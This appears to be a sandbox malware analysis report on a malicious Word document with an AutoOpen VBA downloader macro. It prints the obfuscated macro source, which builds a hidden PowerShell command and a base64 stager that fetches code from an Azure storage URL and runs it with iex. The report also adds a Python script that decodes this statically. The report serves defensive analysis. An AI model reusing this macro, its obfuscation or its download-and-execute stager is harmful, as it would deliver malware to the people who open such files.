Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1105 Ingress Tool Transfer
The sample is a malicious Word document whose VBA project (module "bet", stream ThisDocument) carries an AutoOpen macro. The macro builds its command line one character at a time from the 20-element array EQ_QH; the part visible in the preview reads "powershell -windowstyle hidden -executionpolicy b" before the listing is cut off. In parallel it concatenates 25 string fragments into a base64 blob (BL_QE) which decodes, as UTF-16LE, to a PowerShell stager: it defines a base64-to-UTF-8 helper, calls invoke-webrequest against an Azure Table Storage endpoint (https://usprd5150central.table.core.windows.net/warehouse?$filter=PartitionKey%20eq%20%27stage%27&$Select=data&sv=2017-04-17&ss=bfqt&srt=sco&sp=rwdlacup&se=2017-1..., cut off at the same point) and passes the decoded "data" field to iex. The query string carries an account SAS token (services bfqt, resource types sco, permissions rwdlacup), so the storage account and the token are themselves useful artifacts for tracking the operator. The Shell() call that launches the command, and the remaining switches, lie past the preview's truncation point but are reported by the OLE_VBA_SHELL heuristic. The ClamAV detection name Doc.Dropper.Agent-6467498-0 is consistent with this downloader behaviour. The legacy WordBasic finding below is generic heuristic text; its premise that no VBA project was recovered does not hold for this sample, since macros.bas was extracted from it.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6467498-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6467498-0
- VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace referenced by any Office file that carries a drawing; it is not a network indicator for this sample.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5828 bytes | 1e5c4c1d5fdda89be2faa10795a99c941edabe2aeb386746ff232e2be2e88555 |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "bet"
Sub AutoOpen()
Dim HM_SI As String
EQ_QH = Array("i", "l", "c", "h", "e", "u", "d", "p", "a", "y", " ", "w", "s", "-", "r", "t", "n", "o", "x", "b")
Dim EK_PI As String
EK_PI = "ZgB1AG4AYwB0AGkAbwBuACAAY"
HM_SI = HM_SI + EQ_QH(7)
HM_SI = HM_SI + EQ_QH(17)
Dim FS_KI As String
FS_KI = "QAoACQAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQ"
HM_SI = HM_SI + EQ_QH(11)
HM_SI = HM_SI + EQ_QH(4)
Dim BS_KB As String
BS_KB = "AZQBtAC4AVABlAH"
HM_SI = HM_SI + EQ_QH(14)
HM_SI = HM_SI + EQ_QH(12)
Dim DT_NC As String
DT_NC = "gAdAAuAEUAbgBjAG8AZAB"
HM_SI = HM_SI + EQ_QH(3)
HM_SI = HM_SI + EQ_QH(4)
Dim IS_PJ As String
IS_PJ = "pAG4AZw"
BL_QE = BL_QE & EK_PI & FS_KI & BS_KB & DT_NC & IS_PJ
HM_SI = HM_SI + EQ_QH(1)
HM_SI = HM_SI + EQ_QH(1)
Dim JP_LH As String
JP_LH = "BdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIA"
HM_SI = HM_SI + EQ_QH(10)
HM_SI = HM_SI + EQ_QH(13)
Dim BS_RH As String
BS_RH = "aQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdA"
HM_SI = HM_SI + EQ_QH(11)
HM_SI = HM_SI + EQ_QH(0)
Dim DP_TJ As String
DP_TJ = "BdADoAOgBGAHI"
HM_SI = HM_SI + EQ_QH(16)
HM_SI = HM_SI + EQ_QH(6)
Dim JT_SH As String
JT_SH = "AbwBtAEIAYQBzAGUANgA0AFMAdAByA"
HM_SI = HM_SI + EQ_QH(17)
HM_SI = HM_SI + EQ_QH(11)
Dim IN_TA As String
IN_TA = "GkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIAAkAC"
BL_QE = BL_QE & JP_LH & BS_RH & DP_TJ & JT_SH & IN_TA
HM_SI = HM_SI + EQ_QH(12)
HM_SI = HM_SI + EQ_QH(15)
Dim BT_NC As String
BT_NC = "gAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8AawBlAC0AdwBl"
HM_SI = HM_SI + EQ_QH(9)
HM_SI = HM_SI + EQ_QH(1)
Dim IQ_KC As String
IQ_KC = "AGIAcgBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcA"
HM_SI = HM_SI + EQ_QH(4)
HM_SI = HM_SI + EQ_QH(10)
Dim HN_RB As String
HN_RB = "BzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuAHQAcgB"
HM_SI = HM_SI + EQ_QH(3)
HM_SI = HM_SI + EQ_QH(0)
Dim BQ_NE As String
BQ_NE = "hAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4AdwBpAG"
HM_SI = HM_SI + EQ_QH(6)
HM_SI = HM_SI + EQ_QH(6)
Dim JK_KG As String
JK_KG = "4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoA"
BL_QE = BL_QE & BT_NC & IQ_KC & HN_RB & BQ_NE & JK_KG
HM_SI = HM_SI + EQ_QH(4)
HM_SI = HM_SI + EQ_QH(16)
Dim DT_KI As String
DT_KI = "G8AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AU"
HM_SI = HM_SI + EQ_QH(10)
HM_SI = HM_SI + EQ_QH(13)
Dim JT_OH As String
JT_OH = "ABhAHIAdABpAHQAaQBvAG4ASwB"
HM_SI = HM_SI + EQ_QH(4)
HM_SI = HM_SI + EQ_QH(18)
Dim GO_QD As String
GO_QD = "lAHkAJQAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAG"
HM_SI = HM_SI + EQ_QH(4)
HM_SI = HM_SI + EQ_QH(2)
Dim CQ_LA As String
CQ_LA = "cAZQAlADIANwAmACQAUwBlAG"
HM_SI = HM_SI + EQ_QH(5)
HM_SI = HM_SI + EQ_QH(15)
Dim CL_OB As String
CL_OB = "wAZQBjAHQAPQB"
BL_QE = BL_QE & DT_KI & JT_OH & GO_QD & CQ_LA & CL_OB
HM_SI = HM_SI + EQ_QH(0)
HM_SI = HM_SI + EQ_QH(17)
Dim BN_OB As String
BN_OB = "kAGEAdABhACYAcwB2AD0AMgAwADEANwAt"
HM_SI = HM_SI + EQ_QH(16)
HM_SI = HM_SI + EQ_QH(7)
Dim BQ_NJ As String
BQ_NJ = "ADAANAAtADEANwAmAHMAcwA9AGIAZgBx"
HM_SI = HM_SI + EQ_QH(17)
HM_SI = HM_SI + EQ_QH(1)
Dim BO_OJ As String
BO_OJ = "AHQAJgBzAHIAdAA9AH"
HM_SI = HM_SI + EQ_QH(0)
HM_SI = HM_SI + EQ_QH(2)
Dim BM_TC As String
BM_TC = "MAYwBvACYAcwBwAD0AcgB3AGQAbABhAG"
HM_SI = HM_SI + EQ_QH(9)
HM_SI = HM_SI + EQ_QH(10)
Dim GL_PD As String
GL_PD = "MAdQBwACYAcwBlAD0AMgAwADEANwAtADEA"
BL_QE = BL_QE & BN_OB & BQ_NJ & BO_OJ & BM_TC & GL_PD
HM_SI = HM_SI + EQ_QH(19)
HM_SI = HM_SI
... (truncated)
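The two builders in the listing (one-character appends from an index array for the command line, chunked base64 for the payload) can be evaluated statically, without opening the document. The script below is an added example written for this page, not code from the report, the sandbox or the sample: it parses those statement shapes with regular expressions, replays the assignments in order, decodes the assembled blob as base64 over UTF-16LE (what the "A?" every-other-group pattern indicates and what PowerShell's -EncodedCommand consumes; the switch itself lies past the truncation point) and pulls the Azure SAS fields out of the recovered URL. The embedded macro text is copied from the listing above up to its truncation point; only the layout differs, with statements joined by VBA's ":" separator and the HM_SI appends grouped after the chunk assignments. Variable names are the sample's own; the function names are this example's.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Macro body copied from the listing above up to its truncation point; only the layout
# differs (statements joined with VBA's ":" separator, HM_SI appends grouped last).
SAMPLE_VBA = r'''
Dim HM_SI As String
EQ_QH = Array("i", "l", "c", "h", "e", "u", "d", "p", "a", "y", " ", "w", "s", "-", "r", "t", "n", "o", "x", "b")
Dim EK_PI As String: EK_PI = "ZgB1AG4AYwB0AGkAbwBuACAAY"
Dim FS_KI As String: FS_KI = "QAoACQAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQ"
Dim BS_KB As String: BS_KB = "AZQBtAC4AVABlAH"
Dim DT_NC As String: DT_NC = "gAdAAuAEUAbgBjAG8AZAB"
Dim IS_PJ As String: IS_PJ = "pAG4AZw": BL_QE = BL_QE & EK_PI & FS_KI & BS_KB & DT_NC & IS_PJ
Dim JP_LH As String: JP_LH = "BdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIA"
Dim BS_RH As String: BS_RH = "aQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdA"
Dim DP_TJ As String: DP_TJ = "BdADoAOgBGAHI"
Dim JT_SH As String: JT_SH = "AbwBtAEIAYQBzAGUANgA0AFMAdAByA"
Dim IN_TA As String: IN_TA = "GkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIAAkAC": BL_QE = BL_QE & JP_LH & BS_RH & DP_TJ & JT_SH & IN_TA
Dim BT_NC As String: BT_NC = "gAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8AawBlAC0AdwBl"
Dim IQ_KC As String: IQ_KC = "AGIAcgBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcA"
Dim HN_RB As String: HN_RB = "BzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuAHQAcgB"
Dim BQ_NE As String: BQ_NE = "hAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4AdwBpAG"
Dim JK_KG As String: JK_KG = "4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoA": BL_QE = BL_QE & BT_NC & IQ_KC & HN_RB & BQ_NE & JK_KG
Dim DT_KI As String: DT_KI = "G8AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AU"
Dim JT_OH As String: JT_OH = "ABhAHIAdABpAHQAaQBvAG4ASwB"
Dim GO_QD As String: GO_QD = "lAHkAJQAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAG"
Dim CQ_LA As String: CQ_LA = "cAZQAlADIANwAmACQAUwBlAG"
Dim CL_OB As String: CL_OB = "wAZQBjAHQAPQB": BL_QE = BL_QE & DT_KI & JT_OH & GO_QD & CQ_LA & CL_OB
Dim BN_OB As String: BN_OB = "kAGEAdABhACYAcwB2AD0AMgAwADEANwAt"
Dim BQ_NJ As String: BQ_NJ = "ADAANAAtADEANwAmAHMAcwA9AGIAZgBx"
Dim BO_OJ As String: BO_OJ = "AHQAJgBzAHIAdAA9AH"
Dim BM_TC As String: BM_TC = "MAYwBvACYAcwBwAD0AcgB3AGQAbABhAG"
Dim GL_PD As String: GL_PD = "MAdQBwACYAcwBlAD0AMgAwADEANwAtADEA": BL_QE = BL_QE & BN_OB & BQ_NJ & BO_OJ & BM_TC & GL_PD
HM_SI = HM_SI + EQ_QH(7): HM_SI = HM_SI + EQ_QH(17): HM_SI = HM_SI + EQ_QH(11): HM_SI = HM_SI + EQ_QH(4): HM_SI = HM_SI + EQ_QH(14): HM_SI = HM_SI + EQ_QH(12): HM_SI = HM_SI + EQ_QH(3): HM_SI = HM_SI + EQ_QH(4): HM_SI = HM_SI + EQ_QH(1): HM_SI = HM_SI + EQ_QH(1)
HM_SI = HM_SI + EQ_QH(10): HM_SI = HM_SI + EQ_QH(13): HM_SI = HM_SI + EQ_QH(11): HM_SI = HM_SI + EQ_QH(0): HM_SI = HM_SI + EQ_QH(16): HM_SI = HM_SI + EQ_QH(6): HM_SI = HM_SI + EQ_QH(17): HM_SI = HM_SI + EQ_QH(11): HM_SI = HM_SI + EQ_QH(12): HM_SI = HM_SI + EQ_QH(15)
HM_SI = HM_SI + EQ_QH(9): HM_SI = HM_SI + EQ_QH(1): HM_SI = HM_SI + EQ_QH(4): HM_SI = HM_SI + EQ_QH(10): HM_SI = HM_SI + EQ_QH(3): HM_SI = HM_SI + EQ_QH(0): HM_SI = HM_SI + EQ_QH(6): HM_SI = HM_SI + EQ_QH(6): HM_SI = HM_SI + EQ_QH(4): HM_SI = HM_SI + EQ_QH(16)
HM_SI = HM_SI + EQ_QH(10): HM_SI = HM_SI + EQ_QH(13): HM_SI = HM_SI + EQ_QH(4): HM_SI = HM_SI + EQ_QH(18): HM_SI = HM_SI + EQ_QH(4): HM_SI = HM_SI + EQ_QH(2): HM_SI = HM_SI + EQ_QH(5): HM_SI = HM_SI + EQ_QH(15): HM_SI = HM_SI + EQ_QH(0): HM_SI = HM_SI + EQ_QH(17)
HM_SI = HM_SI + EQ_QH(16): HM_SI = HM_SI + EQ_QH(7): HM_SI = HM_SI + EQ_QH(17): HM_SI = HM_SI + EQ_QH(1): HM_SI = HM_SI + EQ_QH(0): HM_SI = HM_SI + EQ_QH(2): HM_SI = HM_SI + EQ_QH(9): HM_SI = HM_SI + EQ_QH(10): HM_SI = HM_SI + EQ_QH(19)
HM_SI = HM_SI
'''

RE_ARRAY = re.compile(r'^(\w+)\s*=\s*Array\((.*)\)$')                 # X = Array("a", "b", ...)
RE_LITERAL = re.compile(r'^(\w+)\s*=\s*"([^"]*)"$')                   # X = "literal"
RE_APPEND = re.compile(r'^(\w+)\s*=\s*\1\s*\+\s*(\w+)\((\d+)\)$')     # X = X + ARR(n)
RE_CONCAT = re.compile(r'^(\w+)\s*=\s*(\w+(?:\s*&\s*\w+)+)$')         # X = A & B & C

def statements(text):
    """Yield one VBA statement at a time; ':' separates statements unless it is inside a string."""
    for line in text.splitlines():
        buf, quoted = [], False
        for ch in line:
            quoted ^= ch == '"'
            if ch == ":" and not quoted:
                yield "".join(buf).strip()
                buf = []
            else:
                buf.append(ch)
        yield "".join(buf).strip()

def emulate(text):
    """Replay the string-builder statements in order; returns (variables, statements not understood)."""
    env, unhandled = {}, []
    for stmt in statements(text):
        if not stmt or stmt.startswith("Dim "):
            continue
        if m := RE_ARRAY.match(stmt):
            env[m[1]] = re.findall(r'"([^"]*)"', m[2])
        elif m := RE_LITERAL.match(stmt):
            env[m[1]] = m[2]
        elif m := RE_APPEND.match(stmt):
            env[m[1]] = env.get(m[1], "") + env[m[2]][int(m[3])]
        elif m := RE_CONCAT.match(stmt):   # an undeclared Variant such as BL_QE starts out as ""
            env[m[1]] = "".join(env.get(p.strip(), "") for p in m[2].split("&"))
        else:
            unhandled.append(stmt)
    return env, unhandled

def decode_utf16_base64(b64):
    """Base64 over UTF-16LE; an incomplete trailing group is dropped so a cut-off blob still decodes."""
    raw = base64.b64decode(b64[: len(b64) // 4 * 4])
    return raw[: len(raw) // 2 * 2].decode("utf-16-le", errors="replace")

def sas_fields(url):
    """Azure SAS token parameters from the query string, values kept exactly as extracted."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in query.items() if k in ("sv", "ss", "srt", "sp", "st", "se", "sip", "spr", "sig")}

def analyse(vba_text):
    env, unhandled = emulate(vba_text)
    stager = decode_utf16_base64(env["BL_QE"])
    m = re.search(r"'(https?://[^']*)", stager)   # the closing quote may lie past the truncation
    url = m[1] if m else None
    return {"command": env["HM_SI"], "stager": stager, "stage_url": url,
            "sas": sas_fields(url) if url else {}, "unhandled": unhandled}

if __name__ == "__main__":
    for key, value in analyse(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run as a script it prints the recovered command line, the decoded stager, the stage URL and its SAS fields. Anything the emulator did not understand is returned under "unhandled" (here only the no-op "HM_SI = HM_SI" at the truncation point); check that list before trusting the output on a different sample, since a skipped statement means the builders were replayed incompletely.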